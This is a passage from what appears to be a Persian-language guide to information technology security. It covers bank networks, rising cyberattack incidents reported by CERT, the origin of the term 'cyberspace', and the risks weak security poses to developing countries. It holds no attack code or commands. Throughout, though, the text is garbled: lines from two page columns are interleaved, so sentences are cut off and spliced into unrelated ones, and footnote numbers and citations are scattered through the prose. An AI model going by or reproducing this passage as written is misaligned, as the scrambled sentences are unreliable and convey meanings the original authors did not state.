ﺷﺒﻜﺔ ﺗﺒﺎﺩﻝ ﻣﺎﻟﻲ ﻣﻴﺎﻥ ﺑﺎﻧﻜﻬﺎ ﺩﺭ ﮔﺬﺷﺘﻪ ﺍﺯ ﻳـﻚ ﺷـﺒﻜﺔ ﺍﺧﺘـﺼﺎﺻﻲ ۱۴ ﻛﻪ ﺑﻪ ﻣﻬﺎﺭﺕ ﺧﺎﺻﻲ ﻧﻴﺎﺯ ﻧﺪﺍﺭﺩ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ
ﺑﺴﻴﺎﺭ ﺍﻳﻤﻦ ﻛﻪ ﺑﺮﺍﻱ ﻫﻤﻴﻦ ﻫﺪﻑ ﺧﺎﺹ ﻃﺮﺍﺣﻲ ﺷـﺪﻩ ﺑـﻮﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﺑﺎ ﻫﺰﻳﻨﺔ ﻛﻤﺘﺮ ﻭ ﻛﻴﻔﻴﺖ ﺑﺮﺍﺑﺮ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ ﺷـﻮﺩ .ﺍﻳـﻦ ﭘﻴـﺸﻨﻬﺎﺩ ﺩﺭ ﺑـﺎ
ﻣﻲﻛﺮﺩ ﻭ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻧﻴﺰ ﻣﺘﺼﻞ ﻧﺒﻮﺩ .ﺍﻳﻦ ﻣـﺴﺌﻠﻪ ﺑـﺎ ﺩﺭﻧﻈـﺮ ﮔـﺮﻓﺘﻦ ﺍﺳﺘﻘﺒﺎﻝ ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ﻣﻮﺍﺟﻪ ﺷـﺪ ،ﺍﻣـﺎ ﺍﺯ ﺁﻧﺠـﺎ ﻛـﻪ ﺩﺭ ﺍﻳـﻦ ﻧـﻮﻉ
ﺍﺭﺯﺵ ﺯﻳﺎﺩ ﺁﻥ ﺷﺒﻜﻪ ﻭ ﺗﺄﺛﻴﺮﺍﺕ ﺑﺴﻴﺎﺭ ﻣﺨﺮﺏ ﻭ ﺟﺪﻱ ﻫﺮﮔﻮﻧـﻪ ﻧﻔـﻮﺫ ﻭﺍﮔﺬﺍﺭﻱ ﻣﺮﺯﻫﺎﻱ ﻣﻠﻲ ﺩﺭ ﻧﻮﺭﺩﻳﺪﻩ ﻣـﻲﺷـﻮﻧﺪ ،ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺑﺮﺧـﻲ
ﻼ ﻣﻨﻄﻘﻲ ﺑﻨﻈﺮ ﻣﻲﺭﺳﺪ. ﺑﻪ ﺁﻥ ﻛﺎﻣ ﹰ ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺑﻪ ﺑﺎﺭ ﺑﻴﺎﻳﻨﺪ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٣٠
ﺍﺭﺯﺷﻤﻨﺪ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ ﻣﺆﺳﺴﺎﺕ ﭼﻨﺪﺍﻥ ﻗﺎﺑﻞ ﺗﻮﺟﻪ ﻧﻤﻲﺑﺎﺷـﺪ .ﺍﺯ ﺁﻥ ﺍﻃﻼﻉ ﺩﺍﺭﻳﺪ ﻭ ﺑﺎ ﺁﻥ ﻣﻮﺍﻓﻖ ﻫﺴﺘﻴﺪ .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺮﺩﻡ ﺑـﺮﺍﻱ
ﺩﻳﮕﺮ ﻣﻮﺍﺭﺩﻱ ﻛﻪ ﻣﻲ ﺗﻮﺍﻧﺪ ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﺑﺎﺷﺪ ﺁﻧـﺴﺖ ﻛـﻪ ﺗـﺄﺛﻴﺮ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺧﻮﺩ ﺍﻫﻤﻴﺖ ﺯﻳﺎﺩﻱ ﻗﺎﺋﻞ ﻫﺴﺘﻨﺪ ﻭ ﺩﻭﻟﺘﻬﺎ ﻧﻴـﺰ
ﺳﺮﻗﺖ ﻭ ﻭﻗﻮﻉ ﺗﺨﻠﻒ ﻣﺎﻟﻲ ﺩﺭ ﻳﻚ ﺷﺮﻛﺖ ﺗﻨﻬﺎ ﻣﺤﺼﻮﺭ ﺑﻪ ﺁﻥ ﻣﺎﻳﻞ ﺑﻪ ﺣﻔﻆ ﺣﻘﻮﻕ ﺍﻓﺮﺍﺩ ﻣﻲﺑﺎﺷـﻨﺪ ،ﮔﺮﭼـﻪ ﻣﻴـﺰﺍﻥ ﻭ ﺷـﺪﺕ
ﺷﺮﻛﺖ ﻧﻴﺴﺖ ﻭ ﺩﺭ ﻛﻞ ﺻﻨﻌﺖ ﻛﺸﻮﺭ ﺗﺄﺛﻴﺮ ﻣﻲﮔﺬﺍﺭﺩ. ﺍﺟﺮﺍﻱ ﻗﻮﺍﻧﻴﻦ ﺍﺯ ﻳﻚ ﻛﺸﻮﺭ ﺗـﺎ ﻛـﺸﻮﺭ ﺩﻳﮕـﺮ ﻣﺘﻔـﺎﻭﺕ ﺍﺳـﺖ.
ﻣﺴﺌﻠﻪ ﺍﺻﻠﻲ ﺑـﺮﺍﻱ ﺩﻭﻟﺘﻬـﺎ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ﻣﻨـﺎﻓﻊ ﺣﺎﺻـﻞ ﺍﺯ
ﺑﺎ ﮔﺴﺘﺮﺵ ﺍﻳﻨﺘﺮﻧﺖ ﻭ ﺍﻓﺰﺍﻳﺶ ﭼـﺸﻤﮕﻴﺮ ﻧﮕﺮﺍﻧﻴﻬـﺎﻱ ﻧﺎﺷـﻲ ﺍﺯ
ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﻧﻮﻇﻬﻮﺭ ﺭﺍ ﺗﺸﺨﻴﺺ ﺩﻫﻨﺪ ﻭ ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﺍﺭﺯﺷﻬﺎ ﻭ
ﺣﻤﻼﺕ ﺳﺎﻳﺒﺮ ،١٧ﺗﻌﺪﺍﺩ ﭼﻨﻴﻦ ﺣﻮﺍﺩﺛﻲ ﻧﻴﺰ ﺭﻭ ﺑﻪ ﺍﻓﺰﺍﻳﺶ ﺍﺳﺖ:
ﺁﺯﺍﺩﻳﻬﺎﻳﻲ ﻛﻪ ﺑﺪﻭﻥ ﺁﻥ ﻓﻨﺎﻭﺭﻳﻬﺎ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺁﻧﻬﺎ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑـﻮﺩ
"ﺑﺎ ﻭﺟﻮﺩ ﺍﻳﻨﻜﻪ ﺭﺍﻳﺎﻧﻪ ﻫﺎ ﻧﻘﻄﺔ ﻣﻨﺎﺳـﺒﻲ ﺑـﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﺣﻤـﻼﺕ ﺭﺍ ﻫﻤﭽﻨﺎﻥ ﺣﻔﻆ ﻛﻨﻨﺪ .ﻣﻮﺿﻮﻉ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ﺩﻭﻟﺘﻬـﺎ ﺑﺎﻳـﺪ
ﺗﺮﻭﺭﻳﺴﺘﻲ ﻫﺴﺘﻨﺪ ،ﺍﻣﺎ ﺍﻳﻦ ﻧﻜﺘﻪ ﺭﺍ ﻧﻴﺰ ﺑﺎﻳﺪ ﺩﺭﻧﻈـﺮ ﺩﺍﺷـﺖ ﻛـﻪ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺟﺪﻳﺪ ﺭﺍ ﺩﺭﻙ ﻛﺮﺩﻩ ﻭ ﺗﺄﺛﻴﺮ ﻗﺎﺑﻠﻴﺘﻬﺎ ﻭ ﺍﻣﻜﺎﻧﺎﺕ ﻧﻮﻳﻦ
ﺑﺮﺧﻲ ﺍﻗﺪﺍﻣﺎﺕ ﺧﺮﺍﺑﻜﺎﺭﺍﻧﻪ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩﻱ ﺻﻮﺭﺕ ﻣﻲﮔﻴﺮﻧﺪ ﻛـﻪ ﺑﺮ ﺁﺯﺍﺩﻳﻬﺎ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻧﻤﺎﻳﻨـﺪ .ﻫﻤﭽﻨـﻴﻦ ﺩﻭﻟﺘﻬـﺎ ﺑﺎﻳـﺪ ﮔﺎﻣﻬـﺎﻱ
ﺍﺯ ﺍﻳﻦ ﺭﺍﻩ ﺑﺪﻧﺒﺎﻝ ﻛﺴﺐ ﺩﺭﺁﻣﺪ ﻫﺴﺘﻨﺪ .ﻣﺮﻛﺰ ﻓﻮﺭﻳﺘﻬﺎﻱ ﺍﻣﻨﻴـﺖ ﻣﺆﺛﺮﻱ ﺑﺮﺩﺍﺭﻧﺪ ﺗـﺎ ﻣﻄﻤـﺌﻦ ﺷـﻮﻧﺪ ﺍﮔـﺮ ﻗـﻮﺍﻧﻴﻦ ﻭ ﺳﻴﺎﺳـﺘﻬﺎﻱ
ﺭﺍﻳﺎﻧﻪﺍﻱ ) ١٨(CERTﺩﺭ ﺳﺎﻝ ۲۰۰۱ﻣـﻴﻼﺩﻱ ﺭﻗﻤـﻲ ﺑﺮﺍﺑـﺮ ﺑـﺎ ﻋﻤﻮﻣﻲ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﺁﺯﺍﺩﻳﻬـﺎﻱ ﻓﻌﻠـﻲ ﺭﺍ ﺗﻘﻮﻳـﺖ ﻧﻤـﻲﻛﻨﻨـﺪ،
۵۲۶۵۸ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻛﺮﺩﻩ ﻛـﻪ ﺩﻭ ﺑﺮﺍﺑـﺮ ﺣﺪﺍﻗﻞ ﻳﻚ ﻭﻓﺎﻕ ﺟﻤﻌﻲ ﺩﺭ ﻣﻮﺭﺩ ﺁﻧﻬﺎ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ.
ﺗﻌﺪﺍﺩ ﻳﻜﺴﺎﻝ ﻗﺒﻠﺘﺮ ﺍﺳﺖ ﻭ ﻧﺴﺒﺖ ﺑﻪ ﺩﻭ ﺳﺎﻝ ﭘﻴﺶ ﺍﺯ ﺁﻥ ﭼﻬﺎﺭ
١٩ ﻻ ﺑـﺎ ﻋﻨـﻮﺍﻥ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ ١٥ﺷـﻨﺎﺧﺘﻪ ﺩﻧﻴﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻣﻌﻤﻮ ﹰ
ﺑﺮﺍﺑﺮ ﻣﻲﺑﺎﺷﺪ".
ﻣﻲﺷﻮﺩ ﻭ ﺗﻌﺮﻳﻒ ﺁﻥ ﺗﻤﺎﻣﻲ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻛـﻪ
ﺑﺤﺚ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺷﺒﻜﻪﻫﺎ ﺑﺮﺍﻱ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺑﺎ ﺷﺒﻜﻪﻫﺎﻱ ﺩﺍﺧﻠﻲ ﻭ ﺧـﺎﺭﺟﻲ ﺑـﻪ ﻫـﻢ ﻣﺘـﺼﻞ ﻣـﻲ ﺷـﻮﻧﺪ ﻭ
ﺍﺯ ﺍﻫﻤﻴﺖ ﺧﺎﺻﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ .ﺍﻳﻨﺘﺮﻧﺖ ﻣﻲﺗﻮﺍﻧﺪ ﻓﻮﺍﺻﻞ ﺭﺍ ﺍﺯ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﺍﺭﺗﺒﺎﻁ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﺭﺍ ﺩﺭ ﺑﺮ ﻣﻲﮔﻴﺮﺩ ١٦.ﺩﺭ
ﻣﻴﺎﻥ ﺑﺮﺩﺍﺭﺩ ﻭ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻣﻄﺎﻟﺐ ﺑﻲﺷﻤﺎﺭﻱ ﺭﺍ ﻓـﺮﺍﻫﻢ ﻛﻨـﺪ. ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻫﻢ ﻣﺜﻞ ﻓﻀﺎﻱ ﻓﻴﺰﻳﻜﻲ ﻣﻲﺗﻮﺍﻥ ﺩﺭﺑﺎﺭﺓ ﻣﻼﻗﺎﺗﻬﺎ
ﺑــﺎ ﻭﺟــﻮﺩ ﺷــﺒﻜﺔ ﺟﻬــﺎﻧﻲ ﻭﺏ ،ﺍﻳﻨﺘﺮﻧــﺖ ﻗــﺎﺩﺭ ﺧﻮﺍﻫــﺪ ﺑــﻮﺩ ﺍﺯ ﻭ ﺍﻧﺠﺎﻡ ﻛﺎﺭﻫﺎ ﺻﺤﺒﺖ ﻛﺮﺩ ،ﺍﻣـﺎ ﺑﺎﻳـﺪ ﻣﻴـﺎﻥ ﺭﻓﺘـﺎﺭ ﺩﺭ ﻓـﻀﺎﻱ
ﺍﻃﻼﻋــﺎﺕ ﻣﻮﺟــﻮﺩ ﺩﺭﺑــﺎﺭﺓ ﺷــﺮﻛﺘﻬﺎ ،ﺍﻣﻜﺎﻧــﺎﺕ ،ﻭ ﻣﺤــﺼﻮﻻﺕ ﺳﺎﻳﺒﺮ ﻭ ﺩﻧﻴﺎﻱ ﺣﻘﻴﻘﻲ ﻛﻪ ﺩﺭ ﺁﻥ ﺯﻧﺪﮔﻲ ،ﻛﺎﺭ ﻭ ﺑﺎﺯﻱ ﻣﻲﻛﻨـﻴﻢ
ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨـﺪ ﻭ ﺗﺠـﺎﺭﺕ ﺭﺍ ﺩﺭ ﺁﻧﻬـﺎ ﺗﻔﺎﻭﺕ ﻗﺎﺋﻞ ﺷﺪ.
ﺗﻮﺳــﻌﻪ ﺩﻫــﺪ .ﻋــﻼﻭﻩ ﺑــﺮ ﺍﻳــﻦ ،ﻣﻮﺗﻮﺭﻫــﺎﻱ ﺟــﺴﺘﺠﻮ ﺍﺯ ﻧﻈــﺮ
ﮔــﺴﺘﺮﺵ ﻭ ﺭﻭﺍﺝ ﺳــﺮﻳﻊ ﺭﺍﻳﺎﻧــﻪﻫــﺎﻱ ﺷﺨــﺼﻲ ﻭ ﺍﻳﻨﺘﺮﻧــﺖ ﺩﺭ
ﺟﻐﺮﺍﻓﻴﺎﻳﻲ ﺗﻤﺎﻳﺰﻱ ﻣﻴﺎﻥ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﻗﺎﺋـﻞ ﻧﻤـﻲ ﺷـﻮﻧﺪ؛ ﻭ
ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﺗﺄﻣﻴﻦ ﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﻭ ﻛﺎﻻﻫﺎﻱ ﺍﺳﺎﺳﻲ ﻭ ﻣﻮﺍﺩ ﺑﺨﺸﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﻣﻨـﺎﻓﻊ ﺑـﺴﻴﺎﺭﻱ
ﺍﻭﻟﻴـــﺔ ﻛـــﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـــﺎﻝ ﺗﻮﺳـــﻌﻪ ﺭﻭﻱ ﻭﺏ ﺩﺭ ﻛﻨـــﺎﺭ ﺩﺍﺷﺘﻪ ﺍﺳﺖ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺨﻮﺩﻱ ﺧﻮﺩ ﺭﺳـﺎﻧﻪﺍﻱ ﻧﻴـﺴﺖ
ﺗﺄﻣﻴﻦﻛﻨﻨﺪﮔﺎﻥ ﻛﺎﻻﻫﺎ ﻭ ﺧﺪﻣﺎﺕ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘـﻪ ﻗـﺮﺍﺭ ﻛﻪ ﻧﺴﺒﺖ ﺑﻪ ﺭﻓﺘﺎﺭ ﺗﺒﻬﻜﺎﺭﺍﻧﻪ ﺍﻳﻤﻨﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﺪ .ﻫﺰﻳﻨـﺔ ﻋـﺪﻡ
٢١ ﺗﻮﺟﻪ ﻛﺎﻓﻲ ﺑﻪ ﺍﻣﻨﻴﺖ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺩﺳـﺖ ﺩﺍﺩﻥ ﺩﺍﺩﻩﻫـﺎﻱ ﻣـﻮﺭﺩ
ﻣﻲﮔﻴﺮﻧﺪ ٢٠.ﺍﻳﻦ ﺍﻣﺮ ﺭﺍ ﮔﺎﻫﻲ "ﻣـﺮﮒ ﻓﺎﺻـﻠﻪﻫـﺎ" ﻣـﻲﻧﺎﻣﻨـﺪ؛
ﻧﻴﺎﺯ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭ ﻳﻚ ﺳـﺎﺯﻣﺎﻥ ﺑـﺰﺭﮒ ﻳـﺎ ﻣﺆﺳـﺴﺔ ﺩﻭﻟﺘـﻲ
ﻭﺍﮊﻩﺍﻱ ﻛﻪ ﺭﻭﻧﺪ ﺟﺮﻳﺎﻥ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ.
ﺑﺎﺷﺪ .ﺍﻳﻨﺘﺮﻧﺖ ﻣﺎﻫﻴﺘﹰﺎ ﺍﺯ ﺍﻳﻤﻨﻲ ﻻﺯﻡ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻧﻴﺴﺖ ﺍﻣﺎ ﻫﺰﻳﻨـﺔ
ﺍﻣﻦ ﻛﺮﺩﻥ ﺁﻥ ﻧﻴﺰ ﺩﺭ ﻣﻘﺎﻳﺴﻪ ﺑﺎ ﻫﺰﻳﻨﺔ ﺍﺯ ﺩﺳﺖ ﺭﻓﺘﻦ ﺩﺍﺩﻩﻫﺎﻱ
17 Cyber Attacks
18 Computer Emergency Response Team
19 Reuters/USA Today, April 16, 2003 15 Cyberspace
ﺩﺭ ﺣﻘﻴﻘﺖ ﻣﻮﺗﻮﺭﻫـﺎﻱ ﺟـﺴﺘﺠﻮ ﺑـﺮ ﺍﺳـﺎﺱ ﺯﺑـﺎﻥ ﻣﻴـﺎﻥ ﭘﺎﺳـﺨﻬﺎﻱ ۲۰ "ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ" ﺍﻭﻟﻴﻦ ﺑﺎﺭ ﺗﻮﺳـﻂ ﻳـﻚ ﻧﻮﻳـﺴﻨﺪﻩ ﺑـﻪ ﻧـﺎﻡ William ۱۶
ﻳﺎﻓﺘﻪﺷﺪﻩ ﺗﻔﺎﻭﺕ ﻣﻲﮔﺬﺍﺭﻧﺪ ،ﻭ ﻟﺬﺍ ﺩﺭ ﺑﺎﺯﺍﺭ ﺟﻬﺎﻧﻲ ﻫﺮ ﻛـﺲ ﺑﺎﻳـﺪ ﺑـﻪ Gibsonﺑﺮﺍﻱ ﻳﻚ ﺩﻧﻴﺎﻱ ﻣﻮﺍﺯﻱ ﻛﻪ ﺗﻮﺳﻂ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺳﺮﺍﺳﺮ ﺩﻧﻴـﺎ
ﺯﺑﺎﻥ ﺑﺎﺯﺍﺭ ﻫﺪﻑ ﺧﻮﺩ ﺻـﺤﺒﺖ ﻛﻨـﺪ .ﻫﻤﭽﻨـﻴﻦ ﻣﻮﺗﻮﺭﻫـﺎﻱ ﺟـﺴﺘﺠﻮ ﺳـــﺎﺧﺘﻪ ﺷـــﺪﻩ ﺑـــﻮﺩ ﺩﺭ ﺳـــﺎﻝ ۱۹۸۴ﻭ ﺩﺭ ﺭﻣـــﺎﻥ ﺍﻭ ﺑـــﺎ ﻋﻨـــﻮﺍﻥ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺁﻧﻘﺪﺭ ﺗﺤﻤﻞ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻛﻪ ﺑﺨﻮﺍﻫﻨﺪ ﻣﻨﺘﻈـﺮ ﺩﺭﻳﺎﻓـﺖ " "Neuromancerﺑﻜﺎﺭ ﺭﻓﺖ .ﺍﻳﻦ ﺗﻌﺮﻳﻒ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﺍﺩﺑﻴﺎﺕ ﻣﻔﻴﺪ
ﭘﺎﺳﺦ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬﺎﻳﻲ ﺑﺎﺷﻨﺪ ﻛـﻪ ﺍﺭﺗﺒﺎﻃـﺸﺎﻥ ﻛﻨـﺪ ﺍﺳـﺖ .ﺩﺭ ﻫﺮﺣـﺎﻝ ﺑﺎﺷﺪ ،ﺍﻣﺎ ﻣﻌﻨﻲ ﺁﻥ ﺑﺘﺪﺭﻳﺞ ﺍﺯ ﺁﻧﭽﻪ Gibsonﻣﺪ ﻧﻈﺮ ﺩﺍﺷـﺖ ﺗﻐﻴﻴـﺮ
ﺷﺮﻛﺘﻬﺎﻱ ﺗﺠﺎﺭﻱ ﻣﻲﺗﻮﺍﻧﻨﺪ ﭘﺎﻳﮕﺎﻩ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻫﺮ ﻛﺠﺎﻱ ﺩﻧﻴﺎ ﻣﻴﺰﺑﺎﻧﻲ ﻳﺎﻓﺘﻪ ﺍﺳﺖ .ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺑﻪ ﻫﻤﻴﻦ ﭘﺎﻭﺭﻗﻲ ﺩﺭ ﻛﺘﺎﺏ ﺍﺻﻠﻲ ﻭ
ﻛﻨﻨﺪ ﻭ ﺑﮕﻮﻧﻪﺍﻱ ﻣﺤﻞ ﻣﻴﺰﺑﺎﻥ ﺧـﻮﺩ ﺭﺍ ﺑﺮﮔﺰﻳﻨﻨـﺪ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ ﺑـﻪ ﻳﺎ ﻣﻨﺒﻊ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ:
ﺑﺎﺯﺍﺭﻫــﺎﻱ ﻫــﺪﻑ ﻧﺰﺩﻳــﻚ ﺑﺎﺷــﺪ .ﺑﻌــﻀﻲ ﺍﺯ ﺷــﺮﻛﺘﻬﺎ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬــﺎﻱ Intven, et al., Legal and Regulatory Aspects of
e-Commerce and the Internet, World Bank
ﺍﻧﻌﻜﺎﺳﻲ ) (mirror sitesﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ؛ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨـﻲ ﻛـﻪ ﻳـﻚ )Legal Review, vol. 1 2003, at fn 17. (Kluwer
٣١ ﺑﺨﺶ ﺍﻭﻝ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ
ﺳﻴــﺴﺘﻤﻬﺎ ﻭﺍﺭﺩ ﺷــﻮﻧﺪ ﻭ ﻣــﺸﻜﻼﺗﻲ ﺑﻮﺟــﻮﺩ ﺑﻴﺎﻭﺭﻧــﺪ .ﺑﻴــﺸﺘﺮ ﻭﻟﻲ ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﻫﻤﻮﺍﺭﻩ ﻣﺨﺎﻃﺮﺍﺗﻲ ﺟﺪﻱ ﻣﺎﻧﻨـﺪ ﺍﺯ ﺩﺳـﺖ ﺩﺍﺩﻥ
ﻣﺸﻜﻼﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺍﺯ ﺟﺎﻧﺐ ﺧﺮﺍﺑﻜﺎﺭﻫﺎ ٢٤ﻧﺎﺷـﻲ ﺳﻮﺍﺑﻖ ،ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ،ﺧـﺮﺍﺏ ﺷـﺪﻥ ﺍﻃﻼﻋـﺎﺕ ﻭ
ﺑﺨﺶ ﺍﻭﻝ
ﻣﻲﺷﻮﺩ .ﺧﺮﺍﺑﻜﺎﺭﻫﺎ ﺍﻓﺮﺍﺩﻱ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻨﺪ ﺛﺎﺑـﺖ ﻛﻨﻨـﺪ ﺳﺎﻳﺮ ﺍﻧﻮﺍﻉ ﺣﻤﻼﺕ ﺧﺼﻤﺎﻧﻪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺍﺯ ﺩﺳﺖ ﺭﻓﺘﻦ ﺗﻤﺎﻡ ﻳـﺎ
ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻫﺮ ﺳﺪ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﺳﺮ ﺭﺍﻫﺸﺎﻥ ﻗـﺮﺍﺭ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ ﺑﺨﺸﻲ ﺍﺯ ﺳﻮﺍﺑﻖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﺷﺮﻛﺖ ﺭﺍ ﺯﻣﻴﻨﮕﻴـﺮ
ﻋﺒﻮﺭ ﻛﻨﻨﺪ .ﺍﮔﺮ ﺑﺨﻮﺍﻫﻴﻢ ﭼﻨـﻴﻦ ﺭﻓﺘـﺎﺭﻱ ﺭﺍ ﺩﺭ ﺩﻧﻴـﺎﻱ ﻭﺍﻗﻌـﻲ ﻛﻨﺪ .ﺑﺮﺍﻱ ﻛﺸﻮﺭﻱ ﻛﻪ ﺍﻣﻨﻴﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺁﻥ ﺿـﻌﻴﻒ
ﻣﺪﻝ ﻛﻨﻴﻢ ﺑﺎﻳﺪ ﻓﺮﺩﻱ ﻣﻮﺭﺩ ﺍﺷﺎﺭﻩ ﻗﺮﺍﺭ ﺩﻫـﻴﻢ ﻛـﻪ ﻣـﻲﺧﻮﺍﻫـﺪ ﺍﺳﺖ ﺍﻳﻦ ﺍﺣﺘﻤﺎﻝ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻣﻨـﺎﺑﻊ ﺣﻴـﺎﺗﻲ ﺁﻥ ﺩﺭ ﻣﻌـﺮﺽ
ﺛﺎﺑﺖ ﻛﻨﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺧﺎﻧﻪ ﺷﻤﺎ ﻭﺍﺭﺩ ﺷﻮﺩ ﻭ ﺳﭙﺲ ﺑﺪﻭﻥ ﺩﺳﺖ ﺧﻄﺮ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ﻭ ﺑﻪ ﺁﻧﻬﺎ ﺻﺪﻣﺎﺕ ﺟﺒﺮﺍﻥ ﻧﺎﭘـﺬﻳﺮﻱ ﻭﺍﺭﺩ ﺷـﻮﺩ.
ﺯﺩﻥ ﺑﻪ ﭼﻴﺰﻱ ﺧﺎﺭﺝ ﺷﻮﺩ! ﭼﻨﻴﻦ ﭘﺪﻳﺪﻩﺍﻱ ﻧﻪﺗﻨﻬﺎ ﻣﻮﺟﺐ ﺑـﺮﻭﺯ ﻋﺪﻡ ﺗﻮﺟﻪ ﻛﺎﻓﻲ ﺑﻪ ﺍﻣﻨﻴﺖ ﺑـﺮﺍﻱ ﻛـﺸﻮﺭﻫﺎﻳﻲ ﻛـﻪ ﺑـﻪ ﺭﻭﺍﺑـﻂ
ﻧﻮﻋﻲ ﺍﺣﺴﺎﺱ ﻋﺪﻡ ﺍﻃﻤﻴﻨﺎﻥ ﻣﻲﺷﻮﺩ ،ﺑﻠﻜﻪ ﺍﻳﻦ ﺳـﺆﺍﻝ ﺭﺍ ﻧﻴـﺰ ﺧﺎﺭﺟﻲ ﺩﺭ ﺻﻨﺎﻳﻊ ﺧﻮﺩ ﺍﻫﻤﻴـﺖ ﻣـﻲﺩﻫﻨـﺪ ﻣـﻲﺗﻮﺍﻧـﺪ ﻣﻮﺟـﺐ
